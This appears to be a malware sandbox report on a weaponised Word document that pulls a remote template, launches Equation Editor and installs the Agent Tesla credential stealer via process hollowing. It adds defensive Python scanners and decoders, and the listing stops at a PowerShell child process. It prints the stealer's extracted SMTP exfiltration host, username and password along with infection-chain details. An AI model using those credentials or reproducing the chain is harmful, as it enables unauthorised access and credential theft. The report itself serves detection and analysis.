Analysis
- max time kernel: 101s
- max time network: 139s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 02-03-2023 07:36
Static task: static1
Behavioral task: behavioral1
- Sample: Order 84889-CVE2-52022.docx
- Resource: win7-20230220-en
Behavioral task: behavioral2
- Sample: Order 84889-CVE2-52022.docx
- Resource: win10v2004-20230220-en
General
- Target: Order 84889-CVE2-52022.docx
- Size: 10KB
- MD5: 26898dc21c47a0c8ce44952f38be7558
- SHA1: 7ca47776ae520edbb07d58e90e8f8b0194ca4def
- SHA256: 0aa8fae7adcb3b01e64ff034585ab4f7dda57eef969732ca1f46a4645e25bf7e
- SHA512: 36564d02ffc9df006a818909ae1b0c0e4a38f325758b55dc1d61f519c70d41b4f2970338cf9cd87323adaf4df014e79e33886af9aaf36cb893ca8bcff590d883
- SSDEEP: 192:ScIMmtP1aIG/bslPL++uO+zl+CVWBXJC0c3ue:SPXU/slT+LO+zHkZC91
Malware Config
Extracted: agenttesla
- Protocol: smtp
- Host: smtp.huiijingco.com
- Port: 587
- Username: m@huiijingco.com
- Password: lNLUrZT2
- Email To: m@huiijingco.com
Signatures
-
AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and credential stealer; early versions were written in Visual Basic .NET. The configuration extracted above is its exfiltration channel: harvested credentials are sent by SMTP through smtp.huiijingco.com on port 587 (the mail submission port), authenticating as m@huiijingco.com and addressed to that same mailbox.
-
Blocklisted process makes network request (1 IoC)
Processes: EQNEDT32.EXE
- flow 7, PID 1332, EQNEDT32.EXE
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location (2 IoCs)
Processes: WINWORD.EXE
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\14.0\Common (WINWORD.EXE)
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\Common\Offline\Files\http://267199949/e2....................doc (WINWORD.EXE)
The second key records the remote document Word fetched while opening the 10KB .docx. Note the host: it is written as the bare decimal integer 267199949, which Windows' URL stack accepts as the IPv4 address 15.237.37.205, so indicator matching on a dotted-quad form alone would miss it. The fetched file appears under Downloads as e2[1].doc (14KB) in Temporary Internet Files\Content.IE5.
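The remote-template trick behind this signature lives entirely in the .docx package's relationship parts, so it can be found statically before Word ever opens the file. The following is an added example (not part of the sandbox report or its tooling) that walks every `.rels` part of a .docx, reports relationships with `TargetMode="External"`, and normalizes a bare-integer host the way Windows would. The sample document it builds is constructed here for the demonstration; the decimal host reuses the value from the report, while the path `template.doc` and the relationship IDs are assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def normalize_host(host: str) -> str:
    """Expand a bare-integer host such as '267199949' to dotted-quad form.

    Windows' URL stack accepts an IPv4 address written as a single decimal
    number, which defeats naive string matching on the host value.
    Anything that is not a plain integer is returned unchanged.
    """
    if not host.isdigit():
        return host
    n = int(host)
    if n > 0xFFFFFFFF:
        raise ValueError(f"not a 32-bit address: {host}")
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def external_targets(docx_bytes: bytes) -> list:
    """Return every relationship with TargetMode="External" in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append({
                    "part": part,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],  # e.g. attachedTemplate
                    "target": target,
                    "host": normalize_host(urlsplit(target).hostname or ""),
                })
    return findings


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx whose settings part points at a remote template (assumed layout)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body/></w:document>')
        # Internal relationship: must NOT be reported.
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
                   '</Relationships>')
        # External attached template: the remote-template trick.
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
                   f'Target="{template_url}" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for hit in external_targets(build_sample_docx("http://267199949/template.doc")):
        print(hit)
```

Scanning all `.rels` parts rather than only `settings.xml.rels` matters because external targets can also sit in `document.xml.rels` (OLE objects, hyperlinks, frames); the relationship `Type` tells you which mechanism is in play.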
Executes dropped EXE (1 IoC)
Processes: vbc.exe
- PID 896, vbc.exe
Loads dropped DLL (1 IoC)
Processes: EQNEDT32.EXE
- PID 1332, EQNEDT32.EXE
Uses the VBS compiler for execution (1 TTP)
The signature name is a misnomer for this run. The binary involved is C:\Users\Public\vbc.exe, a 976KB dropped executable that only borrows the file name of the VB.NET compiler (vbc.exe is the Visual Basic .NET compiler, not a VBScript component, and the genuine copy lives under C:\Windows\Microsoft.NET\Framework\<version>\). A vbc.exe outside that directory, and in particular one spawned by EQNEDT32.EXE, is a masquerading payload rather than a compiler invocation.
-
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes: RegSvcs.exe
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegSvcs.exe)
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegSvcs.exe)
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegSvcs.exe)
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Network flows:
- flow 9: api.ipify.org
- flow 10: api.ipify.org
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
- File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)
The unexpanded %ProgramData% token inside a SysWOW64 path marks this as a side effect of the 32-bit PowerShell host starting up, not a file the payload deliberately placed; it should not be carried forward as an indicator. The PowerShell activity that matters is the Add-MpPreference exclusion shown in the process tree (the System32 path in that command line resolves to SysWOW64 because the 32-bit parent vbc.exe is subject to WOW64 file-system redirection).
Suspicious use of SetThreadContext (1 IoC)
Processes: vbc.exe
- PID 896 (vbc.exe) set thread context of PID 1144 (RegSvcs.exe)
Read together with the twelve WriteProcessMemory calls from PID 896 into PID 1144 listed further down, and with RegSvcs.exe being started with no arguments, this is the process-hollowing pattern (create the host suspended, write the payload image, set the thread context, resume). It is why the Outlook profile reads and the exfiltration are attributed to RegSvcs.exe, a signed Microsoft .NET utility, rather than to the dropped vbc.exe.
Drops file in Windows directory (1 IoC)
Processes: WINWORD.EXE
- File opened for modification C:\Windows\Debug\WIA\wiatrace.log (WINWORD.EXE)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The signature's stock note ("likely ransomware behaviour") does not apply here: nothing else in this report shows file encryption or ransom activity, and drive enumeration is routine host fingerprinting for a credential stealer.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution. Here vbc.exe registers the task Updates\thHVOlYHyYRLoS from the XML definition C:\Users\Admin\AppData\Local\Temp\tmp1C29.tmp (1KB, hashed under Downloads). The task name matches the file C:\Users\Admin\AppData\Roaming\thHVOlYHyYRLoS.exe that the PowerShell step excludes from Defender, so the task is presumably how that copy gets relaunched; the report itself does not show the task's trigger or action.
-
Launches Equation Editor (1 TTP, 1 IoC)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882. In this run EQNEDT32.EXE (PID 1332) was started out of process with the -Embedding switch once Word had pulled in the remote e2[1].doc; it then loaded a dropped DLL, made a network request (flow 7) and spawned C:\Users\Public\vbc.exe (PID 896), which is the hand-off from exploit to payload. The sandbox does not identify which Equation Editor bug was triggered.
-
Modifies Internet Explorer settings
Processes: WINWORD.EXE (all entries)
- Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"
- Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt
- Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command
- Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
- Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar
- Set value (str) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"
- Key created \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor
- Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"
- Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Set value (int) \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
Every entry is written by WINWORD.EXE and points at Office14 binaries: this is Word's own (re)registration of its HTML/MHTML editor and IE menu extensions, not attacker persistence.
Modifies registry class (64 IoCs)
Processes: WINWORD.EXE (all entries)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command
- Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command
All 64 operations are Word re-registering Office 2010's .htm/.mht OpenWithList entries, the htmlfile/mhtmlfile shell verbs and the msohtmed.exe CLSID; none of them is performed by the payload, which runs in vbc.exe and RegSvcs.exe.
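The REG_BINARY `command` values in the two registry sections above look opaque but are easy to attribute: each is a UTF-16LE Windows Installer "Darwin descriptor" (a 20-character compressed product code, a feature name, `>`, a 20-character compressed component code) followed by the verb's argument tail. Decoding them is the quickest way to confirm these keys belong to Office's own advertised-shortcut registration rather than to the payload. The following is an added example, not part of the report or of any Microsoft tooling; the three hex blobs are copied from the report, and the base-85 alphabet and word layout are the standard ones Windows Installer uses for compressed GUIDs.

```python
# Windows Installer's base-85 alphabet for compressed GUIDs (index == digit value).
_B85 = ("!$%&'()*+,-.0123456789=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "[]^_`abcdefghijklmnopqrstuvwxyz{}~")

# REG_BINARY "command" values copied from the report (all written by WINWORD.EXE).
WORD_COMMAND = ("7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b00"
                "57004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d00"
                "7b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000")
EXCEL_COMMAND = ("7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b00"
                 "45005800430045004c00460069006c00650073003e00560069006a00710042006f00660028005900"
                 "3800270077002100460049006400310067004c00510020002f0064006400650000000000")
PUB_COMMAND = ("7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b00"
               "5000750062005000720069006d006100720079003e00520024006e0075006a005300570046006500"
               "3f007d0061004c00720052007000390078004000570020002500310000000000")


def decompress_guid(packed: str) -> str:
    """Expand a 20-char compressed GUID: four 32-bit words of 5 base-85 digits, least significant first."""
    if len(packed) != 20:
        raise ValueError("compressed GUID must be exactly 20 characters")
    words = []
    for i in range(0, 20, 5):
        value = 0
        for ch in reversed(packed[i:i + 5]):
            value = value * 85 + _B85.index(ch)   # ValueError on a non-alphabet char
        words.append(value)
    d1, d2, d3, d4 = words
    data4 = d3.to_bytes(4, "little") + d4.to_bytes(4, "little")
    return "{%08X-%04X-%04X-%s-%s}" % (d1, d2 & 0xFFFF, d2 >> 16,
                                        data4[:2].hex().upper(), data4[2:].hex().upper())


def decode_darwin_command(hex_value: str) -> dict:
    """Decode a REG_BINARY 'command' value: UTF-16LE Darwin descriptor plus the argument tail."""
    text = bytes.fromhex(hex_value).decode("utf-16-le").rstrip("\x00")
    product, rest = text[:20], text[20:]
    feature, sep, rest = rest.partition(">")
    if not sep:
        raise ValueError("no feature/component separator; not a Darwin descriptor")
    component, args = rest[:20], rest[20:]
    return {
        "product_code": decompress_guid(product),
        "feature": feature,
        "component_code": decompress_guid(component),
        "args": args.strip(),
    }


if __name__ == "__main__":
    for label, blob in (("WORD", WORD_COMMAND), ("EXCEL", EXCEL_COMMAND), ("PUB", PUB_COMMAND)):
        print(label, decode_darwin_command(blob))
```

All three values decode to the same product code, {90140000-0011-0000-0000-0000000FF1CE}, with the features WORDFiles, EXCELFiles and PubPrimary and the argument tails `/n "%1"`, `/dde` and `%1` that also appear in the plain-string `command` values next to them. The 9014xxxx prefix is the Office 2010 (Office14) product-code scheme, which is consistent with the Office14 paths throughout these keys. A payload-written value would not survive this parse or would point at an unrelated product.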
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes: WINWORD.EXE
- PID 1668, WINWORD.EXE
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: vbc.exe, powershell.exe
- PID 896, vbc.exe
- PID 896, vbc.exe
- PID 680, powershell.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: vbc.exe, RegSvcs.exe, powershell.exe, WINWORD.EXE
- Token: SeDebugPrivilege, PID 896, vbc.exe
- Token: SeDebugPrivilege, PID 1144, RegSvcs.exe
- Token: SeDebugPrivilege, PID 680, powershell.exe
- Token: SeShutdownPrivilege, PID 1668, WINWORD.EXE
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: WINWORD.EXE
- PID 1668, WINWORD.EXE
- PID 1668, WINWORD.EXE
Suspicious use of WriteProcessMemory (28 IoCs)
Processes: EQNEDT32.EXE, WINWORD.EXE, vbc.exe
- PID 1332 (EQNEDT32.EXE) wrote to memory of PID 896 (vbc.exe): 4 times
- PID 1668 (WINWORD.EXE) wrote to memory of PID 468 (splwow64.exe): 4 times
- PID 896 (vbc.exe) wrote to memory of PID 680 (powershell.exe): 4 times
- PID 896 (vbc.exe) wrote to memory of PID 1880 (schtasks.exe): 4 times
- PID 896 (vbc.exe) wrote to memory of PID 1144 (RegSvcs.exe): 12 times
In this report every ordinary process launch accounts for four writes (the WINWORD.EXE to splwow64.exe pair is benign print-spooler plumbing); the twelve writes into RegSvcs.exe are the extra image writes of process hollowing, matching the SetThreadContext entry above.
outlook_office_path (1 IoC)
Processes: RegSvcs.exe
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegSvcs.exe)
outlook_win_path (1 IoC)
Processes: RegSvcs.exe
- Key opened \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegSvcs.exe)
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 1668)
  "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order 84889-CVE2-52022.docx"
  - Abuses OpenXML format to download file from external location
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (PID 468)
    C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (PID 1332)
  "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  - C:\Users\Public\vbc.exe (PID 896)
    "C:\Users\Public\vbc.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 680)
